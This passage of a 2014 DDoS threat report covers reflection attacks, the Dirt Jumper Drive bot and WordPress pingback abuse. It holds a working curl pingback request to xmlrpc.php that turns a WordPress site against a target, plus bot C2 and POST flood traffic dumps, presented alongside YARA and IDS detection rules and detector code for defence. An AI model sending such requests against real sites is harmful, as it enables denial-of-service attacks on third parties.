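# Monlist responses appear as "NTPv2, Reserved, length 440"
_NTP = re.compile(r"NTPv2, Reserved, length (?P<len>\d+)")

DNS_MIN_ANSWERS = 100   # assumption: ANY floods return hundreds of RRs
NTP_MONLIST_LEN = 440   # one monlist response fragment (Figure 15)


def classify(line):
    """Return ("dns" | "ntp" | None, reflector_ip) for one tcpdump line."""
    m = _HDR.match(line)
    if not m:
        return None, None
    sport, rest = int(m["sport"]), m["rest"]
    if sport == 53:
        d = _DNS.match(rest)
        if d and int(d["an"]) >= DNS_MIN_ANSWERS:
            return "dns", m["src"]
    elif sport == 123:
        n = _NTP.search(rest)
        if n and int(n["len"]) == NTP_MONLIST_LEN:
            return "ntp", m["src"]
    return None, None


def summarize(lines):
    """Count reflected packets per vector and per reflector address."""
    per_vector = Counter()
    reflectors = defaultdict(Counter)
    for line in lines:
        vector, src = classify(line)
        if vector:
            per_vector[vector] += 1
            reflectors[vector][src] += 1
    return per_vector, reflectors


def top_reflectors(reflectors, vector, n=3):
    """Most active reflector addresses for one vector, for follow-up."""
    return reflectors[vector].most_common(n)


# Constructed sample in the style of Figures 14 and 15. The addresses
# are documentation ranges (RFC 5737), not the report's reflectors.
SAMPLE = [
    "16:39:51.849412 IP 192.0.2.10.53 > x.x.x.x.53: 3573 247/0/1 A 198.51.100.1, A 198.51.100.2",
    "16:39:51.849500 IP 192.0.2.10.53 > x.x.x.x.53: 3574 3/0/0 A 198.51.100.1",
    "13:52:49.995333 IP 198.51.100.7.123 > x.x.x.x.19276: NTPv2, Reserved, length 440",
    "13:52:49.995370 IP 198.51.100.8.123 > x.x.x.x.13520: NTPv2, Reserved, length 440",
    "13:52:49.995375 IP 198.51.100.8.123 > x.x.x.x.13520: NTPv2, Reserved, length 440",
    "13:52:50.000001 IP 198.51.100.9.123 > x.x.x.x.40000: NTPv4, Client, length 48",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    counts, by_src = summarize(SAMPLE)
    for vector in ("dns", "ntp"):
        print(vector, counts[vector], top_reflectors(by_src, vector))
```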

The Drive DDoS malware toolkit uses randomization features when creating its user agent headers in order to make DDoS mitigation more difficult. In this particular binary, PLXsert identified five different user agents being used, with other randomized components added dynamically to the string (Figure 18). Each line below is a separate string fragment found in the binary; the randomized components are inserted between fragments at runtime.

Mozilla/5.0 (Windows NT
.1
; rv:
.0) Gecko/20100101 Firefox/
.0

Opera/9.80 (Windows NT
.1
; U; Edition
Local; ru) Presto/2.10.289 Version/
.0

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
.1
; Trident/4.0; SLCC2;.NET CLR 2.0.
;.NET CLR 3.5.
;.NET CLR 3.0.

Figure 18: Example user agents identified during this campaign

Random country strings may also be added to the user agent header. Those shown in Figure 19 were extracted from the malware toolkit's memory.

Bangladesh
Russia
United Kingdom
Egypt
China
Iran
Mongolia
India
Grenada
Thailand
Romania
Germany
France
Ukraine
United States

Figure 19: Country string options

A full dump of the network traffic is shown in Figure 20 to illustrate the connection process between the bot and C2. Once an attack command is received, the bot commences the POST flood, as shown in Figure 21. The k parameter is an identifier of the Drive toolkit making connection attempts to its C2. This parameter identifies the bot to the C2 during authentication.

CONNECT TO C2

POST /drv/ HTTP/1.1
Host: xxxxxxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.010652;.NET CLR 3.5.010652;.NET CLR 3.0.010652
Accept: text/html
Connection: Keep-Alive
Content-Length: 17
Content-Type: application/x-www-form-urlencoded

k=kpy3er8zr51ov04        <- k parameter necessary for bot identification in Dirt Jumper Drive

ATTACK

POST HTTP/1.1
Host: xxxx
User-Agent: Opera/9.80 (Windows NT 5.1; WOW64; U; Edition Thailand Local; ru) Presto/2.10.289 Version/10.05
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://xxxx
Content-Length: 2443
Content-Type: application/x-www-form-urlencoded

Figure 20: C2 instructions to infected bots, including the k parameter common to the Drive DDoS toolkit

POST HTTP/1.1
Host: /victim
User-Agent: Opera/9.80 (Windows NT 5.1; U; Edition Germany Local; ru) Presto/2.10.289 Version/5.03
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://victim
Content-Length: 2443

POST HTTP/1.1
Host: victim
User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition United States Local; ru) Presto/2.10.289 Version/7.08
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://victim
Content-Length: 2443

POST HTTP/1.1
Host: victim
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2;.NET CLR 2.0.546055;.NET CLR 3.5.546055;.NET CLR 3.0.546055
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://victim
Content-Length: 2443

POST HTTP/1.1
Host: victim
User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://victim
Content-Length: 2443
Content-Type: application/x-www-form-urlencoded

POST HTTP/1.1
Host: victim
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2;.NET CLR 2.0.512775;.NET CLR 3.5.512775;.NET CLR 3.0.512775
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://victim
Content-Length: 2443
Content-Type: application/x-www-form-urlencoded

Figure 21: POST flood attack signatures observed in this campaign

The YARA rule shown in Figure 22 was written by PLXsert in order to identify the Dirt Jumper Drive toolkit used during this campaign. YARA is an open source tool for identifying malware. Running the rule against a potential attack binary should return positive hits for dirtjumper_drive_variant if any of the command strings or the POST flood payload is found in the executable.

rule dirtjumper_drive_variant
{
    strings:
        $cmd1 = "-get" fullword
        $cmd2 = "-post1" fullword
        $cmd3 = "-post2" fullword
        $cmd4 = "-ip" fullword
        $cmd5 = "-ip2" fullword
        $cmd6 = "udp" fullword
        $cmd7 = "-request" fullword
        $cmd8 = "-timeout" fullword
        $cmd9 = "-thread" fullword
        $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
        $str2 = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        $str3 = "Accept-Encoding: gzip,deflate"
    condition:
        4 of ($cmd*) and all of ($str*)
}

Figure 22: YARA rule for the detection of the Drive toolkit

An example run of YARA 2.0 would return the result shown in Figure 23:

$ yara -g ~/Desktop/dirtjumper_drive_variant.yar ~/samples/
dirtjumper_drive_variant [] /samples//drive.exe
dirtjumper_drive_variant [] /samples//764436a7759df842cc660a726db74323c4c27a2741169c502ada70849345aad9

Figure 23: The result from an example run of the YARA rule

Visualization of sourced traffic

The following graphics display visualizations by attack vector. As stated before, the main attack vectors for this campaign were NTP and DNS reflection and amplification, as well as an application layer attack in the form of POST request floods (identified as signatures of Drive). The top source countries for each attack type are shown below.

Source countries of the DNS reflection attacks

The majority of DNS reflectors were from the United States, followed by Russia and Brazil, as shown in Figure 24. The remaining countries in the top ten DNS attack sources were Indonesia, Turkey, China, Netherlands, Australia, Canada and Germany.

Figure 24: Top three source countries of the DNS reflection activity, based on a 12,718-source IP sample set

Source countries for the NTP reflection attacks

The NTP reflection sources originated from several countries. The three source countries with the largest number of reflector servers used within this DDoS attack were South Korea, Russia and Ukraine, as shown in Figure 25. The rest of the top countries represented were the United States, China, Japan, Romania, Germany, Netherlands and Great Britain.

Figure 25: Top 3 source countries of NTP reflection, based on a 5,175-source IP sample set

Source countries for POST attacks from the Drive toolkit

The principal sources of the application layer attack type within this campaign were identified as Turkey, Iran and Argentina, as shown in Figure 26. The remaining top ten countries were identified as Brazil, Mexico, Venezuela, Russia, Spain, India and Poland.

Figure 26: Top 3 source countries of Layer 7 POST attacks, based on a 5,922-source IP sample set

PLXsert was able to verify that the majority of sources from these countries match CPE device signatures. This suggests the source of the Dirt Jumper Drive attack traffic was compromised Microsoft Windows-based computers behind home cable/DSL connections.

Case study: A reflected application DDoS attack

Overview

The Prolexic Security Engineering and Response Team (PLXsert) has observed the abuse of the WordPress pingback function in recent DDoS attack campaigns. One of the attacks highlighted in this case study targeted an Internet media firm that is a customer of Prolexic (now part of Akamai).

This reflected application attack vector exploits a vulnerability in the WordPress pingback function, identified by Common Vulnerabilities and Exposures CVE-2007-0540 in 2007. The pingback functionality, which has been available since WordPress version 2.1.3, is enabled by default in recent versions (3.5 and higher). WordPress applied fixes to validate source Uniform Resource Identifiers (URIs). However, this attempt to prevent potential DDoS attacks still allows attackers to abuse the pingback functionality by using reflection techniques.

Characteristics of the WordPress DDoS pingback application reflection attack

Pingback is an automated function that notifies website administrators when their posts or documents are linked by other websites, so they can track and manage references to their material. Attackers abuse this feature by crafting pingback requests that redirect the responses to the target of the malicious actor, overwhelming the target site with a flood of GET requests. The pingback functionality is important for those sites that depend upon syndication and content distribution. For those sites, turning this feature off is not usually an option.

The main source of this vulnerability is found in the WordPress XML-RPC (XML remote procedure call) file: xmlrpc.php. XML-RPC is a set of specifications used to execute remote procedure calls transported via HTTP and encoded via XML. This allows the transmission and processing of data in disparate operating systems over the Internet.
During these pingback DDoS attacks, malicious actors craft POST requests to an intermediary (victim) WordPress site. These POST requests are spoofed, so that they appear to come from the target site. The pingback response is then reflected to the target site. During an attack, hundreds of thousands of victim WordPress sites could be abused to generate pingback requests to the target site. (Learn more about reflection attacks in our DrDoS white paper series at www.prolexic.com/drdos.) Figure 27 shows the attack signature recorded from the targeted site. The signature has some specific items such as the User-Agent: WordPress(version) and the specification of the target domain in the Host: parameter.

14:11:49.327562 IP x.x.x.x.48048 > x.x.x.x.80: Flags [P.], seq 1:111, ack 1, win 229, options [nop,nop,ts val 256538235 ecr 745511699], length 110
GET / HTTP/1.0
User-Agent: WordPress/3.8.1; http://victim-site
Host: targetdomain
Accept: */*

Figure 27: WordPress pingback attack signature, as seen by the target

Figure 28 shows the POST request, crafted in curl. This illustrates how the pingback attack is executed. A series of parameters had to be specified to generate the pingback response from the victim to the target.

$ curl -D - http://victim/wordpress/xmlrpc.php -H 'Content-type: text/xml' -d '<methodCall>
<methodName>pingback.ping</methodName>
<params>
 <param><value><string>http://target-site</string></value></param>
 <param><value><string>http://victim/wordpress/?p=1</string></value></param>
</params>
</methodCall>'

Figure 28: POST request sent to the victim to generate the pingback response to the target

These elements include methodCall, methodName, string, param, params and value. After this request is crafted and executed, the victim server produces an HTTP 200 OK response, indicating the request was executed successfully (see Figure 29).

HTTP/1.1 200 OK
Date: Thu, 13 Mar 2014 18:11:48 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Connection: close
Content-Length: 370
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>0</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string></string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

Figure 29: The HTTP 200 OK response indicates a successful request

The effectiveness of this attack lies in the leveraging of victim WordPress websites that have pingback functionality enabled. This attack vector typically succeeds by exhausting the number of connections to the target site, rather than by overwhelming the target with bandwidth floods.

Highlighted campaigns

During Q1 2014, PLXsert observed two campaigns where the WordPress pingback attack was identified as the main attack vector. One of the campaigns was against an Internet media site and the second campaign was against a Prolexic/Akamai website.

Campaign A (Internet media company)

The first campaign peaked at approximately 50,000 connections per second and lasted nearly nine hours. The attack was based solely on the WordPress pingback attack vector. Through traffic inspection, we identified thousands of victim sites sending pingback responses to the targeted site.

Attack Types: GET Flood
Target Port: 80
Event Time Start: Mar 12, 2014 14:50:00 UTC
Event Time End: Mar 13, 2014 02:48:15 UTC

                                San Jose     London       Hong Kong    Washington, DC
Peak bits per second (bps)      8.82 Mbps    7.81 Mbps    1.89 Mbps    10.76 Mbps
Peak packets per second (pps)   1.36 Kpps    2.50 Kpps    0.60 Kpps     4.89 Kpps
Peak connections                8.61 Kcon   12.90 Kcon    4.05 Kcon    24.00 Kcon

Figure 30: Campaign A attack traffic distribution by data center

Figure 31: Global distribution of Campaign A connections

Figure 32: Aggregated view of DDoS campaign over time

When the targeted site is not powered by WordPress, DDoS mitigation is simpler. The WordPress pingback has a specific signature, as highlighted in Campaign B.

Campaign B (A Prolexic/Akamai site)

Campaign B peaked at approximately 60,000 connections per second and lasted approximately six hours.

Attack Types: GET Flood
Target Port: 80
Event Time Start: Mar 16, 2014 18:36:00 UTC
Event Time End: Mar 17, 2014 00:33:13 UTC

                                San Jose     London       Hong Kong    Washington, DC
Peak bits per second (bps)      1.10 Mbps   15.30 Mbps  670.00 Kbps    28.00 Mbps
Peak packets per second (pps)   2.20 Kpps   29.00 Kpps    1.10 Kpps    55.00 Kpps
Peak connections               14.19 Kcon   27.47 Kcon    7.14 Kcon    12.39 Kcon

Figure 33: Campaign B attack traffic distribution by data center

Figure 34: Global distribution of Campaign B connections

Recommended detection rules

The IDS rules shown in Figure 35 can be used to detect variants of the WordPress pingback attack vector against a target site.

alert tcp $EXTERNAL_NET any -> $xxxx $HTTP_PORTS ( \
    msg:"action=block, custid=771, timeout=3600, comment=Comment"; sid:10000001; \
    content:"User-Agent\: WordPress"; \
    content:"Host\: target-site|0d 0a|Accept\: */*"; )

alert tcp $EXTERNAL_NET any -> $xxxx $HTTP_PORTS ( \
    msg:"action=block, custid=771, timeout=3600, comment=Comment"; sid:10000002; \
    content:"GET"; \
    content:"User-Agent\: WordPress"; \
    content:"Accept-Encoding\: deflate\;q=1.0, compress\;q=0.5"; \
    content:"Host\: target-site"; )

alert tcp $EXTERNAL_NET any -> $xxxx $HTTP_PORTS ( \
    msg:"action=block, custid=771, timeout=3600, comment=Content"; sid:10000003; \
    content:"GET"; \
    content:"User-Agent\: WordPress"; nocase; \
    content:"Host\: target-site"; )

Figure 35: IDS rules for WordPress pingback attack detection

Conclusion

The WordPress pingback attack is not a new type of attack. It has been in the wild for many years and has recently regained popularity. This attack method is being observed in standalone campaigns as well as in multi-vector DDoS attack campaigns. The main driver behind this type of attack is the failure to prevent the abuse of the pingback feature in the WordPress suite. Unless a WordPress website requires the use of remote posting capabilities, trackbacks or pingbacks from other sites, administrators are strongly encouraged to disable the pingback feature. For many WordPress sites, however, the ability to manage, track and distribute content syndication is a critical measure of their Internet reach.
To create an environment more conducive to DDoS mitigation, WordPress sites would need to implement tracking technologies other than pingback, which would require an additional investment of time, money and resources to determine how their content is syndicated and distributed to subscribers. For WordPress sites under DDoS attack for which pingback is deemed essential and for which no alternate tracking technology has been proactively implemented, the DDoS mitigation challenge is daunting but managed well by specialized DDoS mitigation providers such as Prolexic.
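The content checks in the Figure 35 rules (a GET, a User-Agent beginning with "WordPress", the protected site in the Host header) can also be applied to raw HTTP requests outside an IDS, which additionally lets a defender record which WordPress installations are acting as reflectors, using the URL that WordPress appends to its User-Agent (Figure 27). The Python below is an added example, not part of the report or of Prolexic's rules; the request samples, host names and the PROTECTED_HOSTS set are constructed placeholders.

```python
"""Flag WordPress pingback reflection requests in raw HTTP request text.

Added example (not from the Prolexic report). Applies the same content
checks as the Figure 35 IDS rules and, per matching request, extracts
the reflecting WordPress site from the User-Agent "WordPress/x.y; URL".
"""
import re
from collections import Counter

PROTECTED_HOSTS = {"targetdomain"}   # assumption: the defended site(s)

_REQ_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")
# WordPress identifies itself as "WordPress/<version>; <site URL>"
_UA_SITE = re.compile(r"^WordPress/(?P<ver>[\d.]+);\s*(?P<site>\S+)", re.I)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers) or None."""
    head = raw.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    lines = head.split("\n")
    m = _REQ_LINE.match(lines[0].strip())
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return m["method"], m["path"], headers


def is_pingback_reflection(raw, protected=PROTECTED_HOSTS):
    """True when the request matches the Figure 35 signature."""
    parsed = parse_request(raw)
    if not parsed:
        return False
    method, _path, h = parsed
    ua = h.get("user-agent", "")
    return (method == "GET"
            and ua.lower().startswith("wordpress")   # nocase, as in rule 3
            and h.get("host", "").lower() in protected)


def reflector_site(raw):
    """Return the WordPress site named in the User-Agent, if any."""
    parsed = parse_request(raw)
    if not parsed:
        return None
    m = _UA_SITE.match(parsed[2].get("user-agent", ""))
    return m["site"] if m else None


def summarize(requests):
    """Count matching requests in total and per reflecting site."""
    hits, per_site = 0, Counter()
    for raw in requests:
        if is_pingback_reflection(raw):
            hits += 1
            per_site[reflector_site(raw) or "unknown"] += 1
    return hits, per_site


# Constructed requests in the shape of Figure 27; host names are
# placeholders. The last two are a normal browser request and a
# pingback aimed at a host that is not protected.
SAMPLE = [
    "GET / HTTP/1.0\r\nUser-Agent: WordPress/3.8.1; http://victim-site\r\n"
    "Host: targetdomain\r\nAccept: */*\r\n\r\n",
    "GET / HTTP/1.0\r\nUser-Agent: WordPress/3.8.1; http://victim-site\r\n"
    "Host: targetdomain\r\nAccept: */*\r\n\r\n",
    "GET /?p=1 HTTP/1.0\r\nUser-Agent: WordPress/3.9; http://another-blog\r\n"
    "Host: TargetDomain\r\nAccept-Encoding: deflate;q=1.0, compress;q=0.5\r\n\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: targetdomain\r\n\r\n",
    "GET / HTTP/1.0\r\nUser-Agent: WordPress/3.8.1; http://victim-site\r\n"
    "Host: other-site\r\n\r\n",
]

if __name__ == "__main__":
    total, sites = summarize(SAMPLE)
    print(total, sites.most_common())
```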

Looking forward

Some specific trends identified this quarter hint at the direction of future DDoS attack campaigns. First, among attack vectors that rely on reflection and amplification techniques, NTP and DNS floods have supplanted the use of CHARGEN. The driving forces behind this trend are the creation of tools that allow malicious actors to perform more damaging attacks with fewer resources, and the significant numbers of open or misconfigured DNS and NTP servers.

As reported in the Q4 2013 Global DDoS Attack Report, Asia continues to play a significant role as a source of DDoS attacks, driven by factors such as exponential growth of Internet usage, IT infrastructure mismanagement, rampant software piracy and a growing crime ecosystem. Community efforts are in place to reduce these numbers, but malicious actors will use what remains available and take advantage of the situation. For example, we have observed campaigns where rogue DNS servers were created purposefully to generate a larger DNS response, resulting in greater amplification.

These trends are reinforced by a more than 16 percent increase in NTP amplification attacks and a sustained percentage of DNS attacks throughout Q1 2013, Q4 2013 and Q1 2014. In a laboratory environment, PLXsert analyzed and replicated a 1:50 amplification ratio using the DNS Flooder v1.1 toolkit and an increase of more than 367 percent in packet response using the NTP-AMP tool. It is clear what is driving the creation of these tools. PLXsert believes the development of newer tools that increase the damage of DDoS attacks while using fewer resources will continue. In addition, PLXsert expects the use of attack automation, the DDoS-for-hire market, and mix-and-match multi-vector attack techniques will continue.

PLXsert has also observed the use and reuse of the Dirt Jumper Drive variant. This versatile crimeware kit is becoming as prevalent as the Zeus crimeware kit in the DDoS threatscape.
Malicious actors are continuing to use this kit by re-obfuscating and modifying payloads to avoid detection. This crimeware kit can produce Layer 3 and Layer 7 attacks, and allows malicious actors to engage in flexible campaigns where attack vectors can be switched on demand, depending on a defender's actions.

Campaigns where attackers take a mix-and-match approach while observing and adapting to mitigation responses are becoming more frequent. Multi-vector attacks require higher skill levels as well as multiple and distinct sources and tools available to attackers. These new campaigns are incorporating mobile devices and application-based reflection techniques such as the recently recycled WordPress pingback DDoS attack. History shows that any protocol or application misconfiguration that can be used for DDoS purposes will be effectively incorporated and monetized into the DDoS threatscape. As always, it is essential to continue the cleanup efforts to deny resources to attackers.

The DDoS threatscape is entering a phase where specific verticals are being targeted with more sophisticated and adaptive attack campaigns that require a real-time mitigation response. Mix-and-match, hit-watch-and-switch adaptive DDoS campaigns will move the DDoS threatscape into an arena where technology itself will be insufficient to mitigate attacks. Instead, successful DDoS protection will require a combination of highly skilled defenders and best-of-breed mitigation technology to mitigate these attacks effectively.

About Prolexic Security Engineering & Response Team (PLXsert)

PLXsert monitors malicious cyber threats globally and analyzes DDoS attacks using proprietary techniques and equipment. Through digital forensics and post-attack analysis, PLXsert is able to build a global view of DDoS attacks, which is shared with customers and the security community. By identifying the sources and associated attributes of individual attacks, the PLXsert team helps organizations adopt best practices and make more informed, proactive decisions about DDoS threats.

About Prolexic

Prolexic, now part of Akamai, offers DDoS protection solutions that leverage proprietary DDoS filtering techniques and the world's largest cloud-based DDoS mitigation network. Akamai completed the acquisition of Prolexic in February 2014. Together with Prolexic, Akamai is providing customers with a comprehensive portfolio of security solutions designed to defend an enterprise's Web and IP infrastructure against application-layer, network-layer and data center attacks delivered via the Internet. To learn more about how Prolexic solutions stop DDoS attacks and protect business, please visit www.prolexic.com, follow us on LinkedIn, Facebook, Google+, YouTube, and @Prolexic on Twitter.

2014 Prolexic Technologies, Inc. All rights reserved. v.041614